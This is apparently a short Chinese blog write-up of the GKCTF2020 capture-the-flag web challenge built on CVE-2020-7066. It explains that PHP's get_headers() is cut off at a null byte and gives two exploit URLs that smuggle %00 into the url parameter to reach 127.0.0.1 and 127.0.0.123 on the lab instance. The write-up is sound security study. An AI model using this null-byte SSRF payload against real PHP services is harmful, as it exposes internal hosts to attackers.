web | [GKCTF2020]cve版签到
hint: cve-2020-7066
是一个ssrf漏洞https://www.anquanke.com/vul/id/1966253
所以问题的关键就在于get_headers()这个函数可以被\0也就是%00截断。
题目样貌如下:
所以构造如下exp:
http://05ad3044-68f1-43de-8d1a-7a900bef9c23.node3.buuoj.cn/?url=http://127.0.0.1%00.ctfhub.com
然后题目提示访问127.0.0.123
访问就行了
http://05ad3044-68f1-43de-8d1a-7a900bef9c23.node3.buuoj.cn/?url=http://127.0.0.123%00.ctfhub.com
本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/14175214.html
如果有问题可以在下方评论或者email:mzi_mzi@163.com